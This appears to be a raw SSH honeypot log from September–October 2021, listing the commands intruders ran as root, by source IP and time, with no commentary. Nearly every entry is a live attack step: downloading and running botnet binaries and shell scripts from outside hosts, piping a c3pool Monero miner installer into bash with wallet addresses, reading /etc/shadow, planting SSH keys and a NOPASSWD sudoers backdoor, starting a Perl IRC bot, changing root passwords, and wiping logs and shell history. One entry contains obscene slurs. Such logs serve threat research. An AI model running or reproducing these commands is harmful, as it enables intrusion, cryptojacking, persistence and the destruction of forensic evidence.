curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 124.205.110.250 28-Sep-2021 19:23:53 ssh2 root
Exec uname -a; cd /tmp ;curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
cd /tmp
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 107.189.12.48 29-Sep-2021 00:09:20 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 x86_64; chmod 777 *; echo ur mama
cd /tmp
rm -rf x86_64
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
chmod 777 *
./x86_64 x86_64
chmod 777 *
echo ur mama

From 45.148.120.25 29-Sep-2021 10:44:00 ssh2 root
Exec cd /tmp;rm -rf ur0a.sh;wget http://104.237.202.6/ur0a.sh;chmod +x ur0a.sh;./ur0a.sh;sh ur0a.sh;rm -rf ur0a.sh;cd;history -c;
cd /tmp
rm -rf ur0a.sh
wget http://104.237.202.6/ur0a.sh
chmod +x ur0a.sh
./ur0a.sh
sh ur0a.sh
rm -rf ur0a.sh
cd
history -c

From 45.92.33.28 29-Sep-2021 12:14:43 ssh2 root
unset HISTFILE
w
uname -a
ps x
wget
top
uname -a
ps x
root
netstat -n
w
ping 8.8.8.8
exit

From 34.88.203.227 29-Sep-2021 15:58:48 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://107.172.156.132/catnet.sh; curl -O http://107.172.156.132/catnet.sh; chmod 777 catnet.sh; sh catnet.sh; tftp 107.172.156.132 -c get catnet.sh; chmod 777 catnet.sh; sh catnet.sh; tftp -r catnet2.sh -g 107.172.156.132; chmod 777 catnet2.sh; sh catnet2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.172.156.132 catnet1.sh catnet1.sh; sh catnet1.sh; rm -rf catnet.sh catnet.sh catnet2.sh catnet1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://107.172.156.132/catnet.sh
curl -O http://107.172.156.132/catnet.sh
chmod 777 catnet.sh
sh catnet.sh
tftp 107.172.156.132 -c get catnet.sh
chmod 777 catnet.sh
sh catnet.sh
tftp -r catnet2.sh -g 107.172.156.132
chmod 777 catnet2.sh
sh catnet2.sh
ftpget -v -u anonymous -p anonymous -P 21 107.172.156.132 catnet1.sh catnet1.sh
sh catnet1.sh
rm -rf catnet.sh catnet.sh catnet2.sh catnet1.sh
rm -rf *

From 212.102.57.29 29-Sep-2021 18:46:44 ssh2 root
w
ls -a
ps ax
cat 
w
uname -a
ps ax
ls -a
nproc
cd .
find
bash
ls -a .ssh
cd .ssh
ls -a
cd reglas
ls -a
cat .bash_history
exit

From 139.59.11.181 30-Sep-2021 02:22:16 ssh2 root
passwd

From 27.34.160.186 30-Sep-2021 03:08:52 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u root
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
nproc
nvidia-smi --list-gpus
ps -auxw |grep frp
crontab -l
wls -a
w
exit

From 193.105.134.45 30-Sep-2021 06:40:43 ssh2 root
w
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz --no-check-certificate
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u root
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
curl -O 180.76.250.36/.b/mig
chmod +x mig
mv mig /bin/mig
mig -u root
uname -a
cat /etc/*release
cd
cd /tmp
ls -a
top
ps ax

From 110.7.52.40 30-Sep-2021 08:06:43 ssh2 root
Exec cd /tmp; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; busybox wget http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 newgenroots
cd /tmp
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
busybox wget http://188.213.49.167/x86_64
chmod 777 *
./x86_64 newgenroots
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 205.185.114.141 30-Sep-2021 19:03:05 ssh2 root
Exec cd /tmp; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; busybox wget http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 newgenroots
cd /tmp
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
busybox wget http://188.213.49.167/x86_64
chmod 777 *
./x86_64 newgenroots

From 107.189.12.48 1-Oct-2021 11:24:10 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 x86_64; chmod 777 *; echo ur mama
cd /tmp
rm -rf x86_64
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
chmod 777 *
./x86_64 x86_64
chmod 777 *
echo ur mama

From 209.141.59.200 2-Oct-2021 16:42:29 ssh2 root
Exec wget 107.172.193.113/wrgjwrgjwrg246356356356/rootOwO;chmod 777 rootOwO;./rootOwO
wget 107.172.193.113/wrgjwrgjwrg246356356356/rootOwO
chmod 777 rootOwO
./rootOwO

From 45.148.123.3 2-Oct-2021 20:15:09 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://85.237.217.143/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 85.237.217.143 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://85.237.217.143/SnOoPy.sh
chmod 777 *
sh SnOoPy.sh
tftp -g 85.237.217.143 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 179.43.176.31 3-Oct-2021 04:36:05 ssh2 root
Exec cd /tmp; pkill xmirg; pkill Opera; echo -e dayone#0001ndayone#0001 | passwd root; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
cd /tmp
pkill xmirg
pkill Opera
echo -e dayone#0001ndayone#0001 | passwd root
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
history -cw

From 178.138.96.38 3-Oct-2021 16:36:52 ssh2 root
w
last -10
ls
lscpu
last -10
cat .bash_h
ls -la
cat .bash_history
cat .mysql_history
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget 180.76.250.36/.b/mig
chmod +x mig
mv mig /bin/mig
mig -u root -n 1
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
rm -rf /root/.bash_history
touch /root/.bash_history
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
rm -rf /etc/cron.d/core*
exit

From 37.0.8.38 3-Oct-2021 22:47:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://85.204.116.180/json; curl -O http://85.204.116.180/json; chmod 777 json; ./json Exploit.x86_64; rm -rf json; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://85.204.116.180/json
curl -O http://85.204.116.180/json
chmod 777 json
./json Exploit.x86_64
rm -rf json
history -c

From 46.249.33.122 5-Oct-2021 03:26:10 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://188.213.49.167/x86_64; chmod 777 x86_64; ./x86_64 itwasmeroots
cd /tmp
rm -rf x86_64
wget http://188.213.49.167/x86_64
chmod 777 x86_64
./x86_64 itwasmeroots

From 209.141.60.103 5-Oct-2021 11:41:46 ssh2 root
Exec cd /tmp; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; busybox wget http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 newgenroots
cd /tmp
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
busybox wget http://188.213.49.167/x86_64
chmod 777 *
./x86_64 newgenroots

From 199.195.253.210 6-Oct-2021 14:31:45 ssh2 root
Exec curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 89.144.199.52 6-Oct-2021 15:12:45 ssh2 root
w
ip |grep glo
ip a
ip a|rep glo
ip a|g
ip a|grep glo
ls -a /ho
ls -a /home
last
w
ps -aef
wget -qO- ipv6.icanhazip.com
echo
curl icanhazip.com
apt
apt install curl
apt install curl install curl curl install curl install curl curl curl install curl curl install curl install curl curl install curl install curl curl curl install curl curl curl install
curl icanhazip.com
apt install curl -y
curl icanhazip.com
wget -qO- icanhazip.com|echo
wget -qO- icanhazip.com
echo
wget -qO- https://ipecho.net/plain
echo
w
ls -a
cat .bash_history
cat reglas.pl
ls -a .ssh ls -a .ssh
ls -a .ssh
last
w
ps -aef
cat /etc/hosts
uname -a
cat /etc/*rel*
wget -qO - 185.51.10.233/.cache|perl

From 146.255.75.253 6-Oct-2021 23:29:36 ssh2 root
w
ps x
curl -s https://install.speedtest.net/app/cli/install.deb.sh | sudo bash
curl -s https://install.speedtest.net/app/cli/install.deb.sh | sudo bash -s
wget https://install.speedtest.net/app/cli/install.deb.sh
curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python -
yum install curl
apt-get install curl
apt-get install curl install curl curl
cd /home

From 185.220.102.248 6-Oct-2021 23:32:05 ssh2 root
ls
ls -a
ls
exit

From 45.148.123.3 7-Oct-2021 17:47:42 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.148.121.98/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 45.148.121.98 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.148.121.98/SnOoPy.sh
chmod 777 *
sh SnOoPy.sh
tftp -g 45.148.121.98 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 199.195.253.210 8-Oct-2021 09:52:36 ssh2 root
Exec curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 42TEc4whDKN4EoNkKVeaBQNYkcNpnnP8q9W3GTpou8EGHvRMvqomgGTKxvPfgUuE2FZ6uGYGC31oKRHaAfzWgX3a1pqai7Z
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 42TEc4whDKN4EoNkKVeaBQNYkcNpnnP8q9W3GTpou8EGHvRMvqomgGTKxvPfgUuE2FZ6uGYGC31oKRHaAfzWgX3a1pqai7Z

From 212.193.30.84 8-Oct-2021 22:36:45 ssh2 root
Exec echo hivehcksfrom2mntagoyesme; rm -rf setup_c3pool_miner.sh; pkill java; pkill docker; pkill python; pkill screen; pkill Xorg; pkill xmrig; pkill Opera; pkill Ip; pkill ip; pkill x86_64; pkill x86; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s; ./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo hivehcksfrom2mntagoyesme
rm -rf setup_c3pool_miner.sh
pkill java
pkill docker
pkill python
pkill screen
pkill Xorg
pkill xmrig
pkill Opera
pkill Ip
pkill ip
pkill x86_64
pkill x86
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
curl -O http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
chmod 777 *
./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 8.225.226.100 8-Oct-2021 22:56:53 ssh2 root
Exec uname -a;id;cat /etc/shadow;chattr -ia /root/.ssh/*;wget http://www.nairobix.xyz/.f/authorized_keys -O /root/.ssh/authorized_keys;wget http://fredfoxs.at.ua/files/o;killall -9 perl;perl o irc.unix.fr.to 2083 perl;rm -f o;wget http://www.nairobix.xyz/.f/x -O /tmp/x;chmod +x /tmp/x;/tmp/x;rm -f /tmp/x
uname -a
id
cat /etc/shadow
chattr -ia /root/.ssh/*
wget http://www.nairobix.xyz/.f/authorized_keys -O /root/.ssh/authorized_keys
wget http://fredfoxs.at.ua/files/o
killall -9 perl
perl o irc.unix.fr.to 2083 perl
rm -f o
wget http://www.nairobix.xyz/.f/x -O /tmp/x
chmod +x /tmp/x
/tmp/x
rm -f /tmp/x

From 205.185.124.141 9-Oct-2021 05:56:37 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.33.136/bins/x86; curl -O http://209.141.33.136/bins/x86; chmod 0777 *; ./x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.33.136/bins/x86
curl -O http://209.141.33.136/bins/x86
chmod 0777 *
./x86

From 50.212.157.1 9-Oct-2021 21:26:00 ssh2 root
w
lscpu
id richard
id god
wget suckmydicyoufaggot.comandfuckyourhonneypot.com
wget suckmydicyoufaggot.comandfuckyourhonneypot.com/suckmydickyouUGLYduck
halt
reboot
wall damn honeyshit
exit

From 139.59.11.181 9-Oct-2021 22:25:10 ssh2 root
passwd
ls -a
password
top
ls -a
ps x
d
cd
ls -a
cd /tmp
ls -a
cd /var/tmp
ls -a
cd /dev/shm
ls -a
history

From 27.34.160.186 10-Oct-2021 14:12:42 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u root
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
nproc
nvidia-smi --list-gpus
ps -auxw |grep frp
crontab -l
exit

From 212.193.30.84 11-Oct-2021 02:07:16 ssh2 root
Exec echo hivehcksfrom2mntagoyesme; rm -rf setup_c3pool_miner.sh; pkill java; pkill docker; pkill python; pkill screen; pkill Xorg; pkill xmrig; pkill Opera; pkill Ip; pkill ip; pkill x86_64; pkill x86; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
echo hivehcksfrom2mntagoyesme
rm -rf setup_c3pool_miner.sh
pkill java
pkill docker
pkill python
pkill screen
pkill Xorg
pkill xmrig
pkill Opera
pkill Ip
pkill ip
pkill x86_64
pkill x86
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
curl -O http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
chmod 777 *
./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 212.192.246.88 11-Oct-2021 15:07:40 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://212.192.246.96/jedeon; curl -O http://212.192.246.96/jedeon; chmod 777 json; ./json Exploit.x86_64; rm -rf json; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://212.192.246.96/jedeon
curl -O http://212.192.246.96/jedeon
chmod 777 json
./json Exploit.x86_64
rm -rf json
history -c

From 198.98.49.124 11-Oct-2021 15:34:07 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://85.239.33.9/x86_64; chmod 777 x86_64; ./x86_64 BigHack
cat /etc/issue
cd /tmp/
wget http://85.239.33.9/x86_64
chmod 777 x86_64
./x86_64 BigHack

From 212.193.30.84 12-Oct-2021 01:23:13 ssh2 root
Exec echo hivehcksfrom2mntagoyesme; rm -rf setup_c3pool_miner.sh; pkill java; pkill docker; pkill python; pkill screen; pkill Xorg; pkill xmrig; pkill Opera; pkill Ip; pkill ip; pkill x86_64; pkill x86; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s; curl -O http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; chmod 777 *; ./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo hivehcksfrom2mntagoyesme
rm -rf setup_c3pool_miner.sh
pkill java
pkill docker
pkill python
pkill screen
pkill Xorg
pkill xmrig
pkill Opera
pkill Ip
pkill ip
pkill x86_64
pkill x86
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
curl -O http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
chmod 777 *
./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 198.98.52.98 12-Oct-2021 06:41:30 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://85.239.33.9/x86_64; chmod 777 x86_64; ./x86_64 BigHack
cat /etc/issue
cd /tmp/
wget http://85.239.33.9/x86_64
chmod 777 x86_64
./x86_64 BigHack

From 139.59.11.181 12-Oct-2021 10:48:37 ssh2 root
w
history
top

From 205.185.126.71 13-Oct-2021 16:17:38 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43FfsvebfiL9x6uHd7nc1RfLBDp8ASCfgiNLUfQxV8GtJVqdcX4brm3MiYcm2zgVRmbZoYPdn5YzgDG6ZMbRmq4x2nK337X
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43FfsvebfiL9x6uHd7nc1RfLBDp8ASCfgiNLUfQxV8GtJVqdcX4brm3MiYcm2zgVRmbZoYPdn5YzgDG6ZMbRmq4x2nK337X

From 209.141.54.35 14-Oct-2021 23:40:13 ssh2 root
Exec curl -O 205.185.126.200/x86_64; wget 205.185.126.200/x86_64; chmod 777 x86_64; ./x86_64 damnG; rm x86_64; echo -e "asdasdd#ASD123\nasdasdd#ASD123" | passwd
curl -O 205.185.126.200/x86_64
wget 205.185.126.200/x86_64
chmod 777 x86_64
./x86_64 damnG
rm x86_64
echo -e "asdasdd#ASD123\nasdasdd#ASD123" | passwd

From 212.193.30.210 15-Oct-2021 05:26:08 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.148.120.171/Sakura.sh; chmod 777 *; sh Sakura.sh; tftp -g 45.148.120.171 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.148.120.171/Sakura.sh
chmod 777 *
sh Sakura.sh
tftp -g 45.148.120.171 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 209.141.54.35 15-Oct-2021 06:43:58 ssh2 root
Exec curl -O 205.185.126.200/x86_64; wget 205.185.126.200/x86_64; chmod 777 x86_64; ./x86_64 damnG; rm x86_64; echo -e "asdasdd#ASD123\nasdasdd#ASD123" | passwd
curl -O 205.185.126.200/x86_64
wget 205.185.126.200/x86_64
chmod 777 x86_64
./x86_64 damnG
rm x86_64
echo -e "asdasdd#ASD123\nasdasdd#ASD123" | passwd

From 120.36.227.120 15-Oct-2021 09:00:23 ssh2 root
Exec echo -n ezsfbs8x|md5sum;uname -a
echo -n ezsfbs8x|md5sum
uname -a

From 42.192.96.82 16-Oct-2021 01:47:12 ssh2 root
Exec uname -m;wget http://188.165.196.11/sk;sh sk
uname -m
wget http://188.165.196.11/sk
sh sk

From 27.34.160.186 16-Oct-2021 11:05:16 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u caih
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
nproc
nvidia-smi --list-gpus
ps -auxw |grep frp
crontab -l
w
exit

From 209.141.53.211 17-Oct-2021 16:30:18 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.95.169.115/3.sh; chmod 777 3.sh; sh 3.sh; tftp 45.95.169.115 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 2.sh -g 45.95.169.115; chmod 777 2.sh; sh 2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.169.115 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf 3.sh 1.sh 2.sh ftp1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.95.169.115/3.sh
chmod 777 3.sh
sh 3.sh
tftp 45.95.169.115 -c get 1.sh
chmod 777 1.sh
sh 1.sh
tftp -r 2.sh -g 45.95.169.115
chmod 777 2.sh
sh 2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.95.169.115 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf 3.sh 1.sh 2.sh ftp1.sh
rm -rf *

From 212.192.246.88 18-Oct-2021 19:49:07 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://212.192.246.96/multi/wget.sh; curl -O https://212.192.246.96/multi/wget.sh; chmod 777 wget.sh; sh wget.sh; rm -rf *; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget https://212.192.246.96/multi/wget.sh
curl -O https://212.192.246.96/multi/wget.sh
chmod 777 wget.sh
sh wget.sh
rm -rf *
history -c

From 52.229.190.254 19-Oct-2021 04:16:21 ssh2 root
Exec wget drip-project.xyz/x86_64; chmod 777 *; ./x86_64 drip_payload
wget drip-project.xyz/x86_64
chmod 777 *
./x86_64 drip_payload

From 199.19.226.61 20-Oct-2021 10:43:07 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://194.85.249.86/x86_64; chmod 777 *; ./x86_64 x86xhed
cat /etc/issue
cd /tmp/
wget http://194.85.249.86/x86_64
chmod 777 *
./x86_64 x86xhed

From 209.141.56.75 21-Oct-2021 04:13:21 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://205.185.119.35/x86_64; chmod 777 *; ./x86_64 x86xhed; echo Payloaded; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://205.185.119.35/x86_64
chmod 777 *
./x86_64 x86xhed
echo Payloaded
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 199.19.226.61 21-Oct-2021 10:27:35 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://194.85.249.86/x86_64; chmod 777 *; ./x86_64 x86xhed
cat /etc/issue
cd /tmp/
wget http://194.85.249.86/x86_64
chmod 777 *
./x86_64 x86xhed

From 112.65.206.11 22-Oct-2021 09:53:51 ssh2 root
Exec uname -a;id;cat /etc/shadow /etc/passwd;lscpu;chattr -ia /root/.ssh/*;wget http://highpower.sg/..... -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;wget -qO - http://highpower.sg/...|perl;wget http://highpower.sg/.... -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
uname -a
id
cat /etc/shadow /etc/passwd
lscpu
chattr -ia /root/.ssh/*
wget http://highpower.sg/..... -O ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
wget -qO - http://highpower.sg/...|perl
wget http://highpower.sg/.... -O /tmp/x
chmod +x /tmp/x
/tmp/x
mv /tmp/x /tmp/o
/tmp/o
rm -f /tmp/o
mkdir /sbin/.ssh
cp ~/.ssh/authorized_keys /sbin/.ssh
chown daemon.daemon /sbin/.ssh /sbin/.ssh/*
chmod 700 /sbin/.ssh
chmod 600 /sbin/.ssh/authorized_keys
echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers

From 209.141.59.9 22-Oct-2021 12:19:35 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://205.185.119.35/x86_64; chmod 777 *; ./x86_64 x86xhed; echo Payloaded; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://205.185.119.35/x86_64
chmod 777 *
./x86_64 x86xhed
echo Payloaded
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 157.245.77.248 22-Oct-2021 18:25:10 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.37.79.0/0x83911d24Fx.sh; curl -O http://54.37.79.0/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 54.37.79.0 -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 54.37.79.0; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 54.37.79.0 0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://54.37.79.0/0x83911d24Fx.sh
curl -O http://54.37.79.0/0x83911d24Fx.sh
chmod 777 0x83911d24Fx.sh
sh 0x83911d24Fx.sh
tftp 54.37.79.0 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 54.37.79.0
chmod 777 0xtf2984767.sh
sh 0xtf2984767.sh
ftpget -v -u anonymous -p anonymous -P 21 54.37.79.0 0xft6426467.sh 0xft6426467.sh
sh 0xft6426467.sh
rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh
rm -rf *

From 139.59.144.149 23-Oct-2021 03:22:32 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
